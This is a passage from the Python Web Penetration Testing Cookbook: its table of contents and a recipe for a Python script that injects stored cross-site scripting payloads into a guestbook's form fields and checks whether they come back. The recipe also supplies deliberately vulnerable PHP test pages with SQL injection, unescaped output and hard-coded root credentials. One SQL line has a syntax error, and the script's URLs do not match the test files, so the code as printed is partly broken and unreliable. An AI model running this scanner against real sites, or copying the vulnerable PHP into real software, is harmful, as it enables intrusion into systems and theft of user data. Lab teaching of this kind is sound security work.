Table of Contents for
Python Web Penetration Testing Cookbook
Python Web Penetration Testing Cookbook
Published by
Packt Publishing, 2015
- Cover
- Table of Contents
- Python Web Penetration Testing Cookbook
- Python Web Penetration Testing Cookbook
- Credits
- About the Authors
- About the Reviewers
- www.PacktPub.com
- Disclamer
- Preface
- What you need for this book
- Who this book is for
- Sections
- Conventions
- Reader feedback
- Customer support
- 1. Gathering Open Source Intelligence
- Gathering information using the Shodan API
- Scripting a Google+ API search
- Downloading profile pictures using the Google+ API
- Harvesting additional results from the Google+ API using pagination
- Getting screenshots of websites with QtWebKit
- Screenshots based on a port list
- Spidering websites
- 2. Enumeration
- Performing a ping sweep with Scapy
- Scanning with Scapy
- Checking username validity
- Brute forcing usernames
- Enumerating files
- Brute forcing passwords
- Generating e-mail addresses from names
- Finding e-mail addresses from web pages
- Finding comments in source code
- 3. Vulnerability Identification
- Automated URL-based Directory Traversal
- Automated URL-based Cross-site scripting
- Automated parameter-based Cross-site scripting
- Automated fuzzing
- jQuery checking
- Header-based Cross-site scripting
- Shellshock checking
- 4. SQL Injection
- Checking jitter
- Identifying URL-based SQLi
- Exploiting Boolean SQLi
- Exploiting Blind SQL Injection
- Encoding payloads
- 5. Web Header Manipulation
- Testing HTTP methods
- Fingerprinting servers through HTTP headers
- Testing for insecure headers
- Brute forcing login through the Authorization header
- Testing for clickjacking vulnerabilities
- Identifying alternative sites by spoofing user agents
- Testing for insecure cookie flags
- Session fixation through a cookie injection
- 6. Image Analysis and Manipulation
- Hiding a message using LSB steganography
- Extracting messages hidden in LSB
- Hiding text in images
- Extracting text from images
- Enabling command and control using steganography
- 7. Encryption and Encoding
- Generating an MD5 hash
- Generating an SHA 1/128/256 hash
- Implementing SHA and MD5 hashes together
- Implementing SHA in a real-world scenario
- Generating a Bcrypt hash
- Cracking an MD5 hash
- Encoding with Base64
- Encoding with ROT13
- Cracking a substitution cipher
- Cracking the Atbash cipher
- Attacking one-time pad reuse
- Predicting a linear congruential generator
- Identifying hashes
- 8. Payloads and Shells
- Extracting data through HTTP requests
- Creating an HTTP C2
- Creating an FTP C2
- Creating an Twitter C2
- Creating a simple Netcat shell
- 9. Reporting
- Converting Nmap XML to CSV
- Extracting links from a URL to Maltego
- Extracting e-mails to Maltego
- Parsing Sslscan into CSV
- Generating graphs using plot.ly
- Index
I've already stated that Cross-site scripting is absurdly easy. Amusingly, it is slightly harder to perform stored Cross-site scripting in a scripted fashion. I should probably take back my earlier words at this point, but whatever. The difficulty here is that systems often take an input structure from one page, submit to another page, and return a third page. The following script is designed to handle that most complex of structures.
We will create a script that takes three input values, reads, and submits to all three correctly and checks for success. It shares code with the earlier URL-based Cross-site scripting but differs fundamentally in its execution.
The following script is the functioning test. It is a script that is designed to be manually edited in a framework similar to sublime text or an IDE, as stored XSS is likely to require fiddling:
import requests
import sys
from bs4 import BeautifulSoup, SoupStrainer
url = "http://127.0.0.1/xss/medium/guestbook2.php"
url2 = "http://127.0.0.1/xss/medium/addguestbook2.php"
url3 = "http://127.0.0.1/xss/medium/viewguestbook2.php"
payloads = ['<script>alert(1);</script>', '<scrscriptipt>alert(1);</scrscriptipt>', '<BODY ONLOAD=alert(1)>']
initial = requests.get(url)
for payload in payloads:
d = {}
for field in BeautifulSoup(initial.text, parse_only=SoupStrainer('input')):
if field.has_attr('name'):
if field['name'].lower() == "submit":
d[field['name']] = "submit"
else:
d[field['name']] = payload
req = requests.post(url2, data=d)
checkresult = requests.get(url3)
if payload in checkresult.text:
print "Full string returned"
print "Attack string: "+ payloadThe following is an example of the output produced when using this script with two successful strings:
Full string returned Attack string: <script>alert(1);</script> Full string returned Attack string: <BODY ONLOAD=alert(1)>
We import our libraries as time and time before and establish the URLs we are going to attack. Here, url is the page with the parameters to attack, url2 is the page that the content is going to be submitted to, and url3 is the final page to be read in order to detect whether the attack was successful. Some of these URLs may be shared. They are set in this form because it is very difficult to make a point and click script for stored Cross-site scripting:
url = "http://127.0.0.1/xss/medium/guestbook2.php" url2 = "http://127.0.0.1/xss/medium/addguestbook2.php" url3 = "http://127.0.0.1/xss/medium/viewguestbook2.php"
We then establish a list of payloads. As with the URL-based XSS script, the payload, and check value is the same:
payloads = ['<script>alert(1);</script>', '<scrscriptipt>alert(1);</scrscriptipt>', '<BODY ONLOAD=alert(1)>']
We then create an empty dictionary to pair the payload with each identified input box:
d = {}We are aiming to attack every input parameter in a page, so next, we read our target page:
initial = requests.get(url)
We then create a loop for each value that we put in our payloads list:
for payload in payloads:
We then process the page with BeautifulSoup, which is a library that allows us to carve pages by their tags and defining characteristics. We use this to identify each input field of which we select the name so we can send it content:
for field in BeautifulSoup(initial.text, parse_only=SoupStrainer('input')):
if field.has_attr('name'):Due to the nature of input boxes in the majority of web pages, any fields named submit are not to be targeted for Cross-site scripting and instead need to be given submit as a value in order for our attack to be successful. We create an if function to detect whether this is the case, using the.lower() function to easily account for the potential upper case values that may be used. If the field isn't used to verify submittal, we fill it with the current payload in use:
if field['name'].lower() == "submit":
d[field['name']] = "submit"
else:
d[field['name']] = payloadWe send our now assigned values to the targeted page in a post request by using the requests library, as we have done earlier:
req = requests.post(url2, data=d)
We then load the page that would render our content and prepare it for being used in the check result function:
checkresult = requests.get(url3)
Similar to the scripts before, we check if our string was successful by searching for it on the page and print the result out if it. We then reset the dictionary for the next payload:
if payload in checkresult.text:
print "Full string returned"
print "Attack string: "+ payload
d = {}As before, you can alter this script to include many results or read from a file that contains multiple values. Mozilla's FuzzDB, as shown in the following recipe, contains a vast number of these values.
The following is a setup than can be used to test the script provided in the preceding sections. They need to be saved as the filenames provided to work and in conjunction with a MySQL database to store the comments.
The following is the first interface page named guestbook.php:
<?php
$my_rand = rand();
if (!isset($_COOKIE['sessionid'])){
setcookie("sessionid", $my_rand, "10000000000", "/xss/easy/");}
?>
<form id="contact_form" action='addguestbook.php' method="post">
<label>Name: <input class="textfield" name="name" type="text" value="" /></label>
<label>Comment: <input class="textfield" name="comment" type="text" value="" /></label>
<input type="submit" name="Submit" value="Submit"/>
</form>
<strong><a href="viewguestbook.php">View Guestbook</a></strong>The following script is addguestbook.php, which places your comment in the database:
<?php
$my_rand = rand();
if (!isset($_COOKIE['sessionid'])){
setcookie("sessionid", $my_rand, "10000000000", "/xss/easy/");}
$host='localhost';
$username='root';
$password='password';
$db_name="xss";
$tbl_name="guestbook";
$cookie = $_COOKIE['sessionid'];
$name = $_REQUEST['name'];
$comment = $_REQUEST['comment'];
mysql_connect($host, $username, $password) or die("Cannot contact server");
mysql_select_db($db_name)or die("Cannot find DB");
$sql="INSERT INTO $tbl_name VALUES('0','$name', '$comment', '$cookie')";
$result=mysql_query($sql);
if($result){
echo "Successful";
echo "<BR>";
echo "<h1>Hi</h1>";
echo "<a href='viewguestbook.php'>View Guestbook</a>";
}
else{
echo "ERROR";
}
mysql_close();
?>The final script is viewguestbook.php, which draws the comments from the database:
<html>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
<h1>Comments</h1>
<?php
$my_rand = rand();
if (!isset($_COOKIE['sessionid'])){
setcookie("sessionid", $my_rand, "10000000000", "/xss/easy/");}
$host='localhost';
$username='root';
$password='password';
$db_name="xss";
$tbl_name="guestbook";
$cookie = $_COOKIE['sessionid'];
$name = $_REQUEST['name'];
$comment = $_REQUEST['comment'];
mysql_connect($host, $username, $password) or die("Cannot contact server");
mysql_select_db($db_name)or die("Cannot find DB");
$sql="SELECT * FROM guestbook WHERE session = '$cookie'";";
$result=mysql_query($sql);
while($field = mysql_fetch_assoc($result)) {
print "Name: " . $field['name'] . "\t";
print "Comment: " . $field['comment'] . "<BR>\r\n";
}
mysql_close();
?>